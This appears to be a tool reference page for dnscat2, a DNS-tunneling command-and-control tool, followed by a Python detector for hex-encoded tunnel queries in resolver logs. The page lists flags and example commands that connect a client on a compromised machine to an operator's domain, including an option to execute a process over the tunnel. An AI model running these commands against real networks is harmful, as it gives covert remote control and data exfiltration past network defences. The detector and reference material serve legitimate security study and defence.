Post Exploitation | dns | tunnel | c2 | command-and-control | network

dnscat2

dnscat2 creates an encrypted command-and-control channel over the DNS protocol to tunnel out of restricted networks. It consists of a server for authoritative DNS and a client for compromised machines.

Description

dnscat2 is a DNS tunneling tool designed to establish encrypted command-and-control (C&C) channels over the DNS protocol, effective for bypassing network restrictions. The server component runs on an authoritative DNS server, while the client operates on compromised machines to create stealthy communication paths.

Use cases include post-exploitation scenarios where direct network access is blocked, allowing operators to maintain control through DNS queries that mimic legitimate traffic. The tool supports various DNS record types and configurations for flexibility in different network environments.

It is packaged as a metapackage with separate client and server components, each installable independently for targeted deployments.

How It Works

dnscat2 encapsulates encrypted C&C traffic in DNS packets, using record types such as TXT, MX, CNAME, A, and AAAA. The server listens on a specified host and port for DNS requests and processes them as tunneled data. The client on a compromised host sends DNS queries for the server's domain, with a configurable delay and optional steady timing between packets to evade detection. Communication is encrypted, and a stream can carry console I/O, an executed process, or an interactive command session.
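How this behaviour shows up in resolver logs, as an added defender-side example that is not part of the original page or of dnscat2 itself: it flags a client that sends many distinct names with long hex-encoded subdomain labels (the encoding dnscat2 uses for tunneled data) to one base domain. The log format, thresholds, function names, and sample queries are constructed assumptions.

```python
import re
from collections import defaultdict

HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$")  # long all-hex label; length is an assumed threshold
TUNNEL_QTYPES = {"TXT", "MX", "CNAME", "A", "AAAA"}  # record types named on this page

# Constructed sample resolver log, one query per line: "<client> <qtype> <qname>"
SAMPLE_LOG = """\
10.0.0.5 A www.example.com
10.0.0.5 A mail.example.com
10.0.0.5 AAAA cdn.example.com
10.0.0.5 A api.example.com
10.0.0.9 A 0123456789abcdef0123.cdn.example.net
10.0.0.7 TXT 8a3f01c2d4e5f60718293a4b5c6d7e8f.tunnel.test
10.0.0.7 CNAME 91b7000a1122334455667788.tunnel.test
10.0.0.7 MX a0c4000b99aabbccddeeff00.tunnel.test
10.0.0.7 TXT 5d2e000c0102030405060708.tunnel.test
10.0.0.7 A 77f1000ddeadbeefcafef00d.tunnel.test
"""

def base_domain(qname):
    # Naive "last two labels"; production code should use the Public Suffix List.
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])

def find_tunnel_candidates(log_text, min_unique=4, min_hex_ratio=0.8):
    """Return {(client, base_domain): unique_name_count} for suspicious pairs."""
    names = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3 or parts[1].upper() not in TUNNEL_QTYPES:
            continue
        client, _, qname = parts
        names[(client, base_domain(qname))].add(qname.lower().rstrip("."))
    hits = {}
    for key, qnames in names.items():
        if len(qnames) < min_unique:
            continue  # a single odd-looking name is not a tunnel
        # Count names whose subdomain part contains a long hex label.
        hexy = sum(
            1 for q in qnames
            if any(HEX_LABEL.match(label) for label in q.split(".")[:-2])
        )
        if hexy / len(qnames) >= min_hex_ratio:
            hits[key] = len(qnames)
    return hits

if __name__ == "__main__":
    for (client, domain), count in find_tunnel_candidates(SAMPLE_LOG).items():
        print(f"{client} -> {domain}: {count} unique hex-encoded names")
```

Grouping by client and base domain keeps ordinary browsing (few names, no hex labels) and one-off hashed CDN hostnames below the thresholds, which should be tuned against real traffic before alerting on them.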

Installation

sudo apt install dnscat2

Flags

--help, -h              This page.
--version               Get the version.
--delay <ms>            Set the maximum delay between packets (default: 1000).
--steady                If set, always wait for the delay before sending the next message.
--console               Send/receive output to the console.
--exec, -e <process>    Execute the given process and link it to the stream.
--command               Start an interactive 'command' session (default).
--dns <options>         Enable DNS mode with the given domain. Options include domain=<domain>, host=<hostname>, port=<port>, type=<type>, server=<server>.
-d                      Display more debug info (can be used multiple times).
-v, --version           Get the dnscat version (server).
-d, --dns=<s>           Start a DNS server. Can optionally pass comma-separated name=value pairs (host, port, domain) (server).

Examples

Start dnscat client with DNS driver for the specified domain.
./dnscat --dns domain=skullseclabs.org
Start dnscat client targeting domain with upstream DNS server 8.8.8.8 on port 53.
./dnscat --dns domain=skullseclabs.org,server=8.8.8.8,port=53
Start dnscat client with DNS on non-standard port 5353.
./dnscat --dns domain=skullseclabs.org,port=5353
Start dnscat client using A and CNAME record types.
./dnscat --dns domain=skullseclabs.org,port=53,type=A,CNAME
Start dnscat with default DNS driver on port 53 using the provided hostname.
./dnscat skullseclabs.org
Start dnscat2 server on default host 0.0.0.0 and port 53 with no specific domain.
ruby dnscat2.rb
Start dnscat2 server listening for a particular domain.
ruby dnscat2.rb domain.com
Start dnscat2 server listening on multiple domains.
ruby dnscat2.rb a.com b.com c.com
Start dnscat2 server with custom host, port, and multiple domains.
ruby dnscat2.rb --dns 'host=127.0.0.1,port=53531,domain=a.com,domain=b.com'
Updated 2026-04-16 | kali.org